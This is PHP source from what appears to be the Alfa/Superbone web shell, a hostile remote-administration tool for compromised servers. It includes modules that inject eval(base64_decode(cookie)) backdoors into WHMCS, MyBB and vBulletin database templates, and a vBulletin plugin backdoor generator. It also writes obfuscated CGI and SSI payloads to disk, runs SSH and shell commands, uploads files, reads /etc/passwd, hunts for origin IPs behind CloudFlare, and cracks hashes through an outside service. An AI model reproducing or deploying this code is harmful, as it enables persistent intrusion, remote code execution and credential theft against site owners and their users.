echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"".$ssh_ip."\",\"".$ssh_login."\",\"".$ssh_pass."\",\"".$ssh_port."\",this.ssh_command.value,\">>\"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\'); return false;'><input type=submit name='destsession' value='logout'></form>";

$alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);

stream_set_blocking($alfastream,true);

$output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO);

if($_POST['alfa6']=='>>'){

echo '<pre class=ml1>';

ob_start();

echo stream_get_contents($output);

echo htmlspecialchars(ob_get_clean());

}

echo "</div>";

alfafooter();

}}else{

alfahead();

echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';

alfafooter();

}

}

function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}

function alfaShellInjectors(){

alfahead();

echo '<div class=header>';

AlfaNum(11);

echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';

$selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';

if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){

AlfaNum();

echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";

$table = array('td1' =>

array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),

'td2' =>

array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

'td3' =>

array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

'td4' =>

array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

'td5' =>

array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo $selector;

echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";

if(isset($_POST['alfa6'])) {

$dbu = $_POST['alfa6'];

$dbn = $_POST['alfa7'];

$dbp = $_POST['alfa8'];

$dbh = $_POST['alfa9'];

$path = $_POST['alfa10'];

$method = $_POST['alfa4'];

$index = "{php}".ALFA_UPLOADER.";{/php}";

$newin = str_replace("'","\'",$index);

$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";

if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){

if(filter_var($path,FILTER_VALIDATE_URL)){

$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");

$soleGet = mysqli_fetch_assoc($soleSave);

$tempSave1 = $soleGet['message'];

$tempSave = str_replace("'","\'",$tempSave1);

$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";

$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));

$create = "insert into tblclients (email) values('solevisible@fbi.gov')";

$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));

if(function_exists('curl_version') && $method == 'auto'){

$AlfaSole = new AlfaCURL(true);

$saveurl = $AlfaSole->Send($path."/pwreset.php");

$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);

$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");

$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";

$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));

__alert("shell injectet...");

$ff= 'http://'.$path."/solevisible.php";

output($ff);}else{

echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}

}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){

AlfaNum(1,2,3,5);

echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>

";

$table = array('td1' =>

array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),

'td2' =>

array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),

'td3' =>

array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),

'td4' =>

array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),

'td5' =>

array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')

);

create_table($table);

echo $selector;

echo "<p><input type=submit value=' '></p></form></center></center>";

if(isset($_POST['alfa6'])) {

$dbu = $_POST['alfa6'];

$dbn = $_POST['alfa7'];

$dbp = $_POST['alfa8'];

$dbh = $_POST['alfa9'];

$prefix = $_POST['alfa10'];

$method = $_POST['alfa4'];

$shellCode = "{\${".ALFA_UPLOADER."}}";

$newinshell = str_replace("'","\'",$shellCode);

if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){

$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$inject = "select template from {$prefix}templates where title= 'calendar'";

$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));

$GetTemp = mysqli_fetch_assoc($result);

$saveDate = $GetTemp['template'];

$repsave = str_replace($shellCode,"",$saveDate);

$repsave = str_replace("'","\'",$repsave);

$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";

$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));

$geturl = "select value from {$prefix}settings where name= 'bburl'";

$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));

$rowb = mysqli_fetch_assoc($findurl);

$furl = $rowb['value'];

$realurl = parse_url($furl,PHP_URL_HOST);

$realpath = parse_url($furl,PHP_URL_PATH);

$res = false;

$AlfaCurl = new AlfaCURL();

if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){

if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){

@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");

@fputs($fsock, "HOST: $realurl\r\n");

@fputs($fsock, "Connection: close\r\n\r\n");

$check = fgets($fsock);

if(preg_match("/200 OK/i",$check)){

$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";

$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}

@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){

$AlfaCurl->Send($realurl.$realpath."/calendar.php");

$res = true;

}

if($res){

$ff = 'http://'.$realurl.$realpath."/solevisible.php";

output($ff);

}else{

$ff = 'http://'.$realurl.$realpath."/calendar.php";

$fff = 'http://'.$realurl.$realpath."/solevisible.php";

echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";

}}}}

if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){

AlfaNum(1,2,7,9,10);

echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';

$table = array('td1' =>

array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),

'td2' =>

array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),

'td3' =>

array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),

'td4' =>

array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),

'td5' =>

array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo $selector;

echo '<p><input type="submit" value=" " /></p></form></center>';

if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){

$method = $_POST['alfa8'];

$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";

$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn));

$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='faq'";

$recivedata = @mysqli_query($conn,$rec);

$getd = @mysqli_fetch_assoc($recivedata);

$savetoass = $getd['template'];

$code = str_replace("'","\'",$code);

$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='faq'";

$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));

$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");

$getval = @mysqli_fetch_assoc($geturl);

$saveval = $getval['value'];

$realurl = parse_url($saveval,PHP_URL_HOST);

$realpath = parse_url($saveval,PHP_URL_PATH);

$res = false;

$AlfaCurl = new AlfaCURL();

if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){

if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){

@fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n");

@fputs($fsock, "HOST: $realurl\r\n");

@fputs($fsock, "Connection: close\r\n\r\n");

$check =fgets($fsock);if(preg_match("/200 OK/i",$check)){

$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";

$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));

$res = true;

}

@fclose($fsock);

}

}elseif(function_exists('curl_version') && $method == 'auto'){

$AlfaCurl->Send($realurl.$realpath."/faq.php");

$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";

$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));

$res = true;

}

if($res){

$ff = 'http://'.$realurl.$realpath."/solevisible.php";

output($ff);

}else{

$ff = 'http://'.$realurl.$realpath."/faq.php";

$fff = 'http://'.$realurl.$realpath."/solevisible.php";

echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}

echo '</div>';

alfafooter();

}

function alfaupdatepath(){

if($_POST['path']!=''){

$_SESSION[__LAST_CWD__] = $_POST['path'];

}

echo($_SESSION[__LAST_CWD__]);

}

function alfacheckfiletype(){

$path = $_POST['path'];

$arg = $_POST['arg'];

if(@is_file($path.'/'.$arg)){

echo("file");

}else{

echo("dir");

}

}

function alfacheckupdate(){

if(!isset($_COOKIE['alfa_checkupdate'])){

if(function_exists("curl_version")){

$update = new AlfaCURL();

$json = $update->Send("http://solevisible.com/update.json");

$json = @json_decode($json);

if($json){

if(__ALFA_VERSION__ != $json->version){

@setcookie("alfa_checkupdate", "1", time()+86400);

echo('<div class="update-holder"><div class="update-partner"><div class="update-content"><div onClick="document.getElementsByClassName(\'update-holder\')[0].style.display = \'none\';" class="update-close">X</div><a href="'.$json->url.'" target="_blank">'.$json->text.'<br> Version: '.$json->version.'</a></div></div></div>');

}

}

}

}

}

function alfaWriteTocgiapi($name, $source){

@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));

@mkdir('SUPERBONE',0755);

__write_file("SUPERBONE/".$name, __get_resource($source));

@chmod("SUPERBONE/".$name, 0755);

}

function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}

function alfaupdateheader(){

if(!isset($_SESSION["updateheader_data"])){

$bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";

$realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));

alfaWriteTocgiapi("getheader.alfa",$bash);

$data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa",false,true,true);

if(@is_array(@json_decode($data,true))){

$_SESSION["updateheader_data"] = $data;

echo $data;

}

}else{

echo $_SESSION["updateheader_data"];

}

}

function alfassiShell(){

alfahead();

echo '<div class=header>';

@mkdir('alfa_shtml',0755);

@chdir('alfa_shtml');

alfacgihtaccess('shtml');

$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';

@__write_file('alfa_ssi.shtml',__get_resource($code));

@chmod("alfa_ssi.shtml",0755);

echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');

echo '</div>';

alfafooter();

}

function alfacloudflare(){

alfahead();

AlfaNum(8,9,10,7,6,5,4,3);

echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>

<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";

if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){

$url = $_POST['alfa1'];

if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){

$url = preg_replace('/^(https?):\/\//', '', $url);

$url = "http://www.".$url;

}

$headers = @get_headers($url, 1);

$server = $headers['Server'];

$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');

if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){

if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{

$url = explode($matches[0], $url);

$url = $url[1];}}

if(is_array($server))$server = $server[0];

echo __pre();

if(preg_match('/cloudflare/i', $server))

echo "\n[+] CloudFlare detected: {$server}\n<br>";

else

echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";

echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";

echo "[+] Searching for more IP addresses.\n\n<br><br>";

for($x=0;$x<count($subs);$x++){

$site = $subs[$x] . $url;

$ip = is_ipv4(gethostbyname($site));

if($ip == '(Null)')

continue;

echo "Trying {$site}: {$ip}\n<br>";

}

echo "\n[+] Finished.\n<br>";

}

echo '</div>';

alfafooter();

}

function is_ipv4($ip){

return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';

}

function __alert($s){

echo '<center>'.__pre().$s.'</center>';

}

function create_table($data){

echo '<table border="1">';

foreach ($data as $key => $val){

$array = array();

foreach($val as $k => $v){

$array[$k] = $v;

}

echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><inputtype='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";

}

echo '</table>';

}

function alfaphp2xml(){

alfahead();

AlfaNum(8,9,10,7,6,5,4,3);

echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>

<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>

<input type='submit' name='go' value=' ' /></p></form></center>";

if($_POST['alfa2']&&$_POST['alfa2']=='>>'){

echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";

echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';

echo '</textarea></center></p>';

}

echo '</center></div>';

alfafooter();

}

function alfacpcrack(){

alfahead();

echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';

if($_POST['alfa1']=='dec'){

$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');

echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>

<form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';

foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}

echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';

if($_POST['alfa3'] == '>>'){

$hash = $_POST['alfa2'];

if(!empty($hash)){

$hash_type = $_POST['alfa4'];

$email = "solevisible@gmail.com";

$code = "7b9fa79f92c3cd96";

$target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;

$resp = @file_get_contents($target);

if($resp==''){

$get = new AlfaCURL();

$resp = $get->Send($target);

}

echo __pre().'<center>';

switch($resp){

case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;

case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;

case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;

case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;

}

if(substr($resp,0,4)!='CODE'&&$resp!=''){

echo "<b>Result: <font color='green'>".$resp."</font></b>";

}elseif(substr($resp,0,4)!='CODE'){

echo "<font color='red'>NoT Found</font><br />";

}

echo('</center>');

}

}

}

if($_POST['alfa1']=='analyzer'){

echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>

<form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">

<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';

if($_POST['alfa3'] == '>>'){

$hash = $_POST['alfa2'];

if(!empty($hash)){

$curl = new AlfaCURL();

$resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");

echo(__pre().'<center>');

if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){

echo('<font color="green">'.$s[1].'</font>');

}else{

echo('<font color="red">Not Found...!</font>');

}

echo('</center><br>');

}

}

}

echo '</div>';

alfafooter();

}

function alfafooter(){

if(!isset($_POST['ajax'])){

echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >

<tr>

<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>

<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>

<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>

<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>

</tr>

<tr>

<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>

<td colspan='2'><form onsubmit=\"editor(this.file.value,'auto','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>

</tr>

<tr>

<td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);this.c.value='';return false;\"><span><span class='footer_text'>Execute :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>

</tr>

<tr>

<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>

<input type='hidden' name='a' value='FilesMAn'>

<input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>

<input type='hidden' name='alfa1' value='uploadFile'>

<input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>

<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./Superbone Right Here &copy; 2012-".date('Y')." ]</span></td>

</tr>

</table>

</div>

<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div>

<div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div>

<div id='update-content'></div>

<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div>

